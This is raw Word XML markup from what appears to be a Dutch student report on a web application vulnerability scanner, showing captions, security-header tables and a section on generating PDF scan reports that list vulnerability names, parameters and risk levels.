    <w:p w14:paraId="3D5AFBEA" w14:textId="6BF99867" w:rsidR="00D47555" w:rsidRDefault="00FA0598" w:rsidP="00F7458D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252748800" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="615889A6" wp14:editId="63EDEEA7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-901199</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-896854</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3D0D6" id="Rectangle 610" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.95pt;margin-top:-70.5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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="004677A9">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5C5BD"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1"/>
        <w:gridCol w:w="4531"/>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04AAF553" w:rsidR="00B6378B" w:rsidRDefault="002A4A48" w:rsidP="005A4148">
      <w:r>
        <w:t>Tabel 4.6</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79A9180B"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1"/>
        <w:gridCol w:w="4531"/>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sniffing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r w:rsidR="000E5685">
              <w:t>clickjacking in iframes</w:t>
            </w:r>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scripting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Key-Pins</w:t>
            </w:r>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r>
              <w:t>HttpOnly</w:t>
            </w:r>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5AD34350" w:rsidR="001F7A69" w:rsidRDefault="00B9794E" w:rsidP="001F7A69">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A4A48">
        <w:t>Tabel 4.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056B19CF" w14:textId="77777777" w:rsidR="009A217C" w:rsidRDefault="009A217C">
      <w:r>
        <w:t>SecurityReport zoekt voor elke hyperlink naar deze 6 security headers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72">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68FE198C" w:rsidR="00773100" w:rsidRDefault="000F4055" w:rsidP="00F73F47">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figuur 4.19</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4DF5A"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241096">
          <w:headerReference w:type="default" r:id="rId73"/>
          <w:headerReference w:type="first" r:id="rId74"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="347724F4" w14:textId="46AF5B91" w:rsidR="00773100" w:rsidRPr="009F60A0" w:rsidRDefault="009F60A0" w:rsidP="00376E85">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252780544" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="266A11AC" wp14:editId="59A8DE1C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-901199</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1008012</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5D1A2" id="Rectangle 648" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.95pt;margin-top:-79.3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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00AA5DFB">
        <w:t>4.5</w:t>
      </w:r>
      <w:r w:rsidR="00D3619C">
        <w:t>.4 Rapporteren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5CB818" w14:textId="3672CCC5" w:rsidR="00BA25A8" w:rsidRDefault="00BA25A8" w:rsidP="008571B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ACD2537" w14:textId="74F13585"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w:t>
      </w:r>
      <w:r w:rsidR="00BF43B7">
        <w:t xml:space="preserve"> website</w:t>
      </w:r>
      <w:r w:rsidR="001609F7">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007E2671">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B1849">
        <w:t xml:space="preserve">Na dat het rapport is gegenereerd wordt het via e-mail verstuurd naar de desbetreffende klant. </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44407E0D"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r>
              <w:t>Eind tijd</w:t>
            </w:r>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r>
              <w:t>Eind tijd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77270D96" w:rsidR="00687310" w:rsidRDefault="000F4055" w:rsidP="008571B9">
      <w:r>
        <w:t>Tabel 4.8</w:t>
      </w:r>
    </w:p>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30412BC1" w:rsidR="00390F17" w:rsidRDefault="000F4055" w:rsidP="008571B9">
      <w:r>
        <w:t>Tabel 4.9</w:t>
      </w:r>
    </w:p>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4F38531E" w:rsidR="00E52256" w:rsidRDefault="000F4055" w:rsidP="008571B9">
      <w:r>
        <w:t>Tabel 4.10</w:t>
      </w:r>
    </w:p>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Naam van kwetsbaarheid e.g. SQLi</w:t>
            </w:r>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De HTTP-werkwoord die gebruikt is. GET of POST</w:t>
            </w:r>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3ED99518" w14:textId="3C39827A" w:rsidR="000F4055" w:rsidRPr="000F4055" w:rsidRDefault="000F4055" w:rsidP="00B3103C">
      <w:r w:rsidRPr="000F4055">
        <w:t>Tabel 4.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5649FE59" w14:textId="6AE846E7" w:rsidR="00B3103C" w:rsidRPr="00AF6B35" w:rsidRDefault="00AF6B35" w:rsidP="00B3103C">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55FBF"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11F04E3" w:rsidR="00B3103C" w:rsidRDefault="00376E85" w:rsidP="00B3103C">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252921856" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4E0B6316" wp14:editId="6893E9EF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-903224</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-896620</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A6290" id="Rectangle 477" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.1pt;margin-top:-70.55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D8/3oq&#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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B3103C">
        <w:t xml:space="preserve">Het genereer proces heeft als doel om de data van een gescande website te verwerken in een rapport van pdf-formaat. De </w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>Webapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="00B3103C">
        <w:t xml:space="preserve"> heeft hiervoor een feature dat HTML documenten converteren in pdf-</w:t>
      </w:r>
      <w:r w:rsidR="00780F3E">
        <w:t xml:space="preserve">formaten. Dit betekende dat ik de scan data </w:t>
      </w:r>
      <w:r w:rsidR="00B3103C">
        <w:t>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GridTable4-Accent4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4531"/>
        <w:gridCol w:w="4531"/>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Voor het bouwen van dynamische HTML documenten</w:t>
            </w:r>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Het renderen van php blad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4CF4AC14" w:rsidR="00B3103C" w:rsidRDefault="000F4055" w:rsidP="00B3103C">
      <w:r>
        <w:t>Tabel 4.12</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E2204E" w:rsidRPr="00E14E1E" w:rsidRDefault="00E2204E"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46"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ilrcyToCAAB7BAAADgAAAAAA&#10;AAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAJerKU+EAAAAKAQAADwAA&#10;AAAAAAAAAAAAAACSBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAKAFAAAAAA==&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7A967E0D" w14:textId="24D31D86" w:rsidR="00E2204E" w:rsidRPr="00E14E1E" w:rsidRDefault="00E2204E"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5">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w:lastRenderedPageBreak/>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43711"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4BAC891E" w:rsidR="00D422CF" w:rsidRDefault="00340E52">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253209600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="351518DF" wp14:editId="292E75EB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-10795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>8276590</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1079500" cy="235585"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="798" name="Text Box 798"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="10795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75896" w14:textId="766E6F84" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur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18DF" id="Text Box 798" o:spid="_x0000_s1147" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-.85pt;margin-top:651.7pt;width:85pt;height:18.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7D375896" w14:textId="766E6F84" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 4.21</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000F4055">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252811264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="292F81E4" wp14:editId="184CCB4C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>377825</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2226310</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1516380" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="3302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1638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E2204E" w:rsidRDefault="00E2204E"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F81E4" id="Text Box 686" o:spid="_x0000_s1148" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:29.75pt;margin-top:175.3pt;width:119.4pt;height:18pt;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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="480D827C" w14:textId="268B2531" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00ED70C3">
                      <w:r>
                        <w:t>URL</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00E76057">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E2204E" w:rsidRDefault="00E2204E"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49"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0742636F" w14:textId="22F9710B" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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E2204E" w:rsidRDefault="00E2204E"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50"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7FCFDC75" w14:textId="205F082B" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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E2204E" w:rsidRDefault="00E2204E">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51"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="06C0105E" w14:textId="163E101E" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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E2204E" w:rsidRDefault="00E2204E"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52"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7F954EFA" w14:textId="14053E2E" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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E2204E" w:rsidRDefault="00E2204E"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53"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="723219CF" w14:textId="76780A05" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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27CB"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7AF6"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E2204E" w:rsidRDefault="00E2204E"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54"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C8pA0yjAIAAI4FAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQA&#10;BgAIAAAAIQCJ/Hv63wAAAAoBAAAPAAAAAAAAAAAAAAAAAOQEAABkcnMvZG93bnJldi54bWxQSwUG&#10;AAAAAAQABADzAAAA8AUAAAAA&#10;" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1B9930EB" w14:textId="31794127" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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E2204E" w:rsidRDefault="00E2204E"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55"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ABN+ZVjAIAAI4FAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQA&#10;BgAIAAAAIQDUHzo03wAAAAoBAAAPAAAAAAAAAAAAAAAAAOQEAABkcnMvZG93bnJldi54bWxQSwUG&#10;AAAAAAQABADzAAAA8AUAAAAA&#10;" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6EC909AA" w14:textId="0AB9AC37" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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E2204E" w:rsidRDefault="00E2204E"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56"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3AD51AE9" w14:textId="16299132" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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E2204E" w:rsidRDefault="00E2204E"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57"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="607CCEB6" w14:textId="3811FF73" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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D7592"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E2204E" w:rsidRDefault="00E2204E">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58"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6B4D7B46" w14:textId="1690AC1C" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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E2204E" w:rsidRPr="00143071" w:rsidRDefault="00E2204E">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59"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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7E23188F" w14:textId="60B7FF99" w:rsidR="00E2204E" w:rsidRPr="00143071" w:rsidRDefault="00E2204E">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01CF"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E2204E" w:rsidRDefault="00E2204E"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60"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2F7732F0" w14:textId="40E2CF34" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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E2204E" w:rsidRDefault="00E2204E"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61"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4E9C7BB3" w14:textId="2AEAB499" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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E60D"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E2204E" w:rsidRDefault="00E2204E"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62"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4643F6ED" w14:textId="77D9B8CE" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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E2204E" w:rsidRDefault="00E2204E"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63"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CoNdC/igIAAI4FAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAI&#10;AAAAIQAYUMjo3gAAAAoBAAAPAAAAAAAAAAAAAAAAAOIEAABkcnMvZG93bnJldi54bWxQSwUGAAAA&#10;AAQABADzAAAA7QUAAAAA&#10;" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="05B68F15" w14:textId="7EA976EA" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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4C9F535A">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E2204E" w:rsidRDefault="00E2204E"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64"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BpjcFWiwIAAI4FAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQA&#10;BgAIAAAAIQC7OH7z4AAAAAoBAAAPAAAAAAAAAAAAAAAAAOMEAABkcnMvZG93bnJldi54bWxQSwUG&#10;AAAAAAQABADzAAAA8AUAAAAA&#10;" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="24F0B8B3" w14:textId="4256598F" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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E2204E" w:rsidRDefault="00E2204E">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65"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8dWFh4oCAACOBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYA&#10;CAAAACEAzA/HGt8AAAAKAQAADwAAAAAAAAAAAAAAAADiBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAA&#10;AAAEAAQA8wAAAO4FAAAAAA==&#10;" fillcolor="#e7e6e6 [3214]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="30D72CE7" w14:textId="3400C9A5" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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93AD"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E2204E" w:rsidRDefault="00E2204E"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66"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="32B3EDFF" w14:textId="161AC8E6" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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E2204E" w:rsidRDefault="00E2204E"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67"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="57701D06" w14:textId="5C047972" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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E2204E" w:rsidRDefault="00E2204E"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68"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OayFGWJAgAAjgUAAA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgA&#10;AAAhALCE9jPeAAAACgEAAA8AAAAAAAAAAAAAAAAA4QQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAA&#10;BAAEAPMAAADsBQAAAAA=&#10;" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="388A38FE" w14:textId="3B737584" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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E2204E" w:rsidRDefault="00E2204E">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69"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" fillcolor="#e7e6e6 [3214]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2DC44B91" w14:textId="383C9133" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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7A977"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371BFFF0" w:rsidR="00B64191" w:rsidRDefault="00340E52">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253210624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="10EEF160" wp14:editId="76806E2D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-10795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>7216775</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1460500" cy="229235"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="799" name="Text Box 799"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="146050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B0D4C" w14:textId="71CD69E6" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur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EF160" id="Text Box 799" o:spid="_x0000_s1170" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-.85pt;margin-top:568.25pt;width:115pt;height:18.05pt;z-index:2532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aHXoCAABmBQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtI2xVYK1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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="011B0D4C" w14:textId="71CD69E6" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 4.22</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DC69"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E2204E" w:rsidRDefault="00E2204E">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71"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" fillcolor="#e7e6e6 [3214]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="354C0F85" w14:textId="78652A28" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Advies</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E2204E" w:rsidRDefault="00E2204E"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72"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" fillcolor="#e7e6e6 [3214]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="15AD48F4" w14:textId="5FBD61D1" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00B938E3">
                      <w:r>
                        <w:t>Details van gevonden kwetsbaarheden</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E2204E" w:rsidRDefault="00E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73"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CrjeI0jAIAAI8FAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQA&#10;BgAIAAAAIQDAcof93wAAAAoBAAAPAAAAAAAAAAAAAAAAAOQEAABkcnMvZG93bnJldi54bWxQSwUG&#10;AAAAAAQABADzAAAA8AUAAAAA&#10;" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="78E44F2E" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"/>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E2204E" w:rsidRDefault="00E2204E"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74"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5AYo4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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="57B20F3C" w14:textId="45C57126" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00CA42D5">
                      <w:r>
                        <w:t>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E2204E" w:rsidRDefault="00E2204E"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75"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1F210BFA" w14:textId="1FCA797D" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00CA42D5">
                      <w:r>
                        <w:t>Modul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E2204E" w:rsidRDefault="00E2204E"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76"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="536647A6" w14:textId="7A53F7FD" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00CA42D5">
                      <w:r>
                        <w:t>Risico</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E2204E" w:rsidRDefault="00E2204E"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77"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6D88FC83" w14:textId="112D0BB4" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00CA42D5">
                      <w:r>
                        <w:t>Target UR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E2204E" w:rsidRDefault="00E2204E"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78"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="029004AA" w14:textId="29AB3D00" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00CA42D5">
                      <w:r>
                        <w:t>Paramete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E2204E" w:rsidRDefault="00E2204E"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79"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6FB10490" w14:textId="52C49923" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00CA42D5">
                      <w:r>
                        <w:t>Aanva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E2204E" w:rsidRDefault="00E2204E"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80"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="627CAEDE" w14:textId="7648861C" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00CA42D5">
                      <w:r>
                        <w:t>Erro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E2204E" w:rsidRDefault="00E2204E"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81"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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7FBD36E3" w14:textId="2069F6D2" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00CA42D5">
                      <w:r>
                        <w:t>WASC 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E2204E" w:rsidRDefault="00E2204E"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82"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li6Wp40CAACOBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAU&#10;AAYACAAAACEA2aSIe98AAAAKAQAADwAAAAAAAAAAAAAAAADlBAAAZHJzL2Rvd25yZXYueG1sUEsF&#10;BgAAAAAEAAQA8wAAAPEFAAAAAA==&#10;" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0E515D70" w14:textId="6E2C4ADF" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00CA42D5">
                      <w:r>
                        <w:t>Method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E2204E" w:rsidRDefault="00E2204E"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83"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19wI4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Cu9fcCOAgAAjgUAAA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0A&#10;FAAGAAgAAAAhAKiUI5XfAAAACwEAAA8AAAAAAAAAAAAAAAAA5gQAAGRycy9kb3ducmV2LnhtbFBL&#10;BQYAAAAABAAEAPMAAADyBQAAAAA=&#10;" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5F9160D7" w14:textId="6FDF8D61" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00CA42D5">
                      <w:r>
                        <w:t>Datum</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DA01"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3542B"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02936"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4091DEC5" w:rsidR="00E12294" w:rsidRDefault="00E12294">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68E5F62D" w14:textId="5DE524AA" w:rsidR="00E12294" w:rsidRDefault="00E12294">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:sectPr w:rsidR="00E12294" w:rsidSect="00241096">
          <w:headerReference w:type="default" r:id="rId76"/>
          <w:headerReference w:type="first" r:id="rId77"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DB9211D" w14:textId="6F03E277" w:rsidR="00E12294" w:rsidRPr="006F480C" w:rsidRDefault="00365A3C" w:rsidP="00013211">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252872704" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1526213D" wp14:editId="4F18ECB7">
                <wp:simplePos x="0" y="0"/>
